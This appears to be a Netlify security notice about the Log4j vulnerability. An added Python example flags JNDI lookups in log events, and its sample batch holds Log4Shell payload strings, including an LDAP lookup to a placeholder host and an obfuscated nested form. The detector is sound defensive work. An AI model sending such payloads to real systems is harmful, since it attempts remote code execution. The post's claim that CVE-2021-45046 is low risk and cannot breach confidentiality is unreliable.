Like you, Netlify became aware of the vulnerability in Apache Log4j (CVE-2021-44228) last week. We immediately ensured that neither customer-facing nor web-visitor-facing aspects of our service were vulnerable.
We are posting this note to confirm and communicate our security checks, and to encourage you to run your own checks against any third-party services you use to build or operate the websites and applications you host on Netlify.
At a high level, none of our servers or services (e.g., those reached via API or WebSocket connection) are vulnerable; all systems with dependencies on Apache Log4j have been patched to the latest non-vulnerable version. We validated this using various scanning tools, backed by a comprehensive manual audit of our core services.
However, Netlify does not filter or block traffic containing exploit payloads. If you use our reverse proxying feature, we pass requests on unmodified, so please ensure that any systems we connect to on your behalf are not vulnerable! Similarly, we pass unmodified log events through our Log Drains service, and customers should ensure that any systems configured to receive Netlify Log Drains are not vulnerable.
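One defender-side check a Log Drains receiver can run before handing events to a Log4j-backed pipeline, as an added Python example (not Netlify's code): it flags records whose string fields contain a Log4j JNDI lookup or a nested lookup. The sample batch and its field names are constructed for illustration and do not assume Netlify's actual drain schema.

```python
from __future__ import annotations

import json
import re
from typing import Iterator

# Case-insensitive match for a Log4j lookup naming the JNDI resolver, plus any
# nested "${...${" lookup, which is rare in legitimate traffic and worth review.
SUSPECT_LOOKUP = re.compile(r"\$\{[^}]*jndi:|\$\{[^}]*\$\{", re.IGNORECASE)


def _string_values(obj) -> Iterator[str]:
    """Yield every string nested anywhere inside a decoded JSON value."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _string_values(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _string_values(v)


def flag_suspect_events(ndjson: str) -> list[dict]:
    """Return the events (one JSON object per line) that contain a suspect lookup.

    Lines that are not valid JSON are still inspected as raw text, so a malformed
    record cannot carry an unmodified payload past the check.
    """
    hits = []
    for line in ndjson.splitlines():
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            event = {"raw": line}
        if any(SUSPECT_LOOKUP.search(s) for s in _string_values(event)):
            hits.append(event)
    return hits


# Constructed sample batch; field names are illustrative, not a real drain format.
SAMPLE_BATCH = "\n".join([
    '{"request_id": "1", "url": "/index.html", "user_agent": "Mozilla/5.0", "status": 200}',
    '{"request_id": "2", "url": "/search?q=${jndi:ldap://example.invalid/a}", "status": 404}',
    '{"request_id": "3", "url": "/", "headers": {"x-forwarded-for": "${${lower:j}ndi:x}"}}',
    '{"request_id": "4", "url": "/price?amount=${100}", "status": 200}',
])

if __name__ == "__main__":
    for hit in flag_suspect_events(SAMPLE_BATCH):
        print("suspect log event:", hit["request_id"])
```

Events 2 and 3 are flagged; event 4 is not, because a plain `${...}` with no nested lookup and no `jndi:` is left alone.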
Our team is aware of the additional vulnerability in Log4j as well, CVE-2021-45046. Given its LOW risk rating, we will not make a separate customer-facing announcement about it. Since this additional vulnerability cannot directly cause Confidentiality or Integrity violations, we agree that it is LOW risk, and if our assessments show that remediation work is needed for CVE-2021-45046, we will prioritize that work through our normal internal processes.
We will continue to stay vigilant and communicate with you if there are any further developments. In the meantime, please post below if you have questions or concerns! (Members of paid teams, you can also reach us through netlify.com/support with questions)